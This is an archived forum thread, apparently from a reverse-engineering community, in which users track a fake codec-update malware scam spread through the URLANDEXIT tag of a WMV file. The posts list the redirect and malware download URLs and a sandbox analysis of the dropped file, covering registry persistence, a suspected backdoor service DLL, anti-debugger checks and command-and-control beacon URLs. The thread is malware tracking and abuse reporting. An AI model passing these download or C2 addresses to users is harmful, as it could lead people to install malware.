Log in

View Full Version : URLANDEXIT tag in WMV


evaluator
November 4th, 2009, 10:03
fake torrent, URLANDEXIT tag inside WMV file contains
http//tpbtrack.com/
which redirects to http//microsoftmedicenter.com/ for dld
codec_update2.7.exe

kill this WEB_page soon. don W!

Woodmann
November 4th, 2009, 17:38
Howdy,

I cant kill it eval, Comodo wont let me.

Don W

evaluator
January 27th, 2010, 09:13
happi mu yer! Don Wooma!

you are true fighter with malware!
today i check & microsoftmedicenter not exists... also tpbtrack.com..

but wait! what if we tape:
http://www.tpbtrack.com/
!>!>!>

it workZ! & redirects to:

http://microsoftmediaplayer.net/pluginerror/

bonus site for malware DL:
http://ppirush.com/list.txt

Woodmann
January 27th, 2010, 18:53
Howdy,

The redirect doesnt work.
Firefox can't find the server at microsoftmediaplayer.net.

Micro probably had that site killed.

Woodmann

evaluator
January 28th, 2010, 07:45
not kiled at all..
maybe for you that address are just blocked as malicious?
here is TCP dump of session with malware..

DNS-query:
91.121.97.116 > ks28732.kimsufi.com

Th3_uN1Qu3
February 11th, 2010, 15:37
Quote:
[Originally Posted by evaluator;84979]not kiled at all..
maybe for you that address are just blocked as malicious?


I can confirm that, site is still online. Hmm, it's the good old codec scam. Wonder how many will fall for it again.

Silkut
February 14th, 2010, 10:30
http://www.virustotal.com/analisis/3a4b84557ffbbd32cdaf43efbc0ba5d11a5b22d690580da5930a79da0027b662-1266157076 8/41
Also submitted on TE/Jotti/CWSandbox/Norman/Sunbelt

Reg change and Network activity is interesting...

Ensure to run at every start
Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "TOY5KNQ8OC" = C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\Hm1.exe


Drops shit (bet its a backdoor)
Code:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SSHNAS\Parameters "ServiceDll" = [REG_EXPAND_SZ, value: C:\WINDOWS\system32\sshnas21.dll]


Change filetype association:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"


Crypted config to avoid e-z detection
Code:
HKEY_CURRENT_USER\Software\TOY5KNQ8OC "Hr0" = tSLPLpWL7R22spR48AI743bz2Kge8sERw0qmuz25hgohx8cxtNMwr8rBWqitGUb/zraVBDDj5hLpEwYXNxEcPXZ9sJFaDKKtXmxIvCsKfL3BUK2YmKdwy0wP+mREmBu3qeV4TyHp6lc/8xIj6ehCR1T2ygeXbopFSi+wcuZzVX7WEc60vs/gvM40+JErmIzaB2QhZba725R1sr2kOfmVOMnMlPUv0JruzRQ9mA==


Abuse your TCP/IP network
Code:
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Tcp6
\Device\RasAcd


Adds tasks (and hide them)
Code:
C:\WINDOWS\Tasks\{35DC3473-A719-4d14-B7C1-FD326CA84A0C}.job


Checks for nifty tools
Code:
Open File: \\.\SICE (OPEN_EXISTING)
Open File: \\.\NTICE (OPEN_EXISTING)
Open File: \\.\SIWVIDSTART (OPEN_EXISTING)
Open File: \\.\VMDRV (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)


Post shit to infected sites
Code:
http://66.199.229.230/bbgfvdfv.php?data=v26MmjSySdemXz907AUYROBra+ftI9M9b4xfTXYnLRkHCVTSihWLzGqhA0jEdVaN1M6V6shGcAiBMF4QEH bzbYSRtufQpaX/NPttvu7rkw== (workartsstudio.com)
http://64.20.38.251/logos/2aac1e812a13a04cf10ec85187f31ca7b22154fc7b77b63fec5e37e6648b5f8a317d04508db39388c/64d84457f3e/logo.gif (homeartscenter.com)
http://94.75.228.24/werber/34f8b457d37/217.gif (multiartshouse.com)
http://69.10.35.253/perce/9acc6e112a53a02cf1fef83147c3fc073291b47c8b77c66ffccea7e6e42baf7ae11d94007d4333783/24a874f7a37/qwerce.gif (tangoartsshow.com)
http://208.43.125.180/oms.php (yourgot.com)
http://66.197.161.246/resolution.php (motorolam.com)
http://66.197.161.247/borders.php (easyaw.com)




etc etc...


MMPC report status (so they can shut this prick down): https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=e3d2c8a8-480b-4228-bdf3-5b7f2f302ba2&n=1

evaluator
September 6th, 2010, 14:13
today checked, and
http://www.tpbtrack.com/
is for sale..

DonWooma, you are amazing!!

but yet alive is:
http://microsoftmediaplayer.net/pluginerror/

Woodmann
September 6th, 2010, 17:41
Why must you do this to me .

DW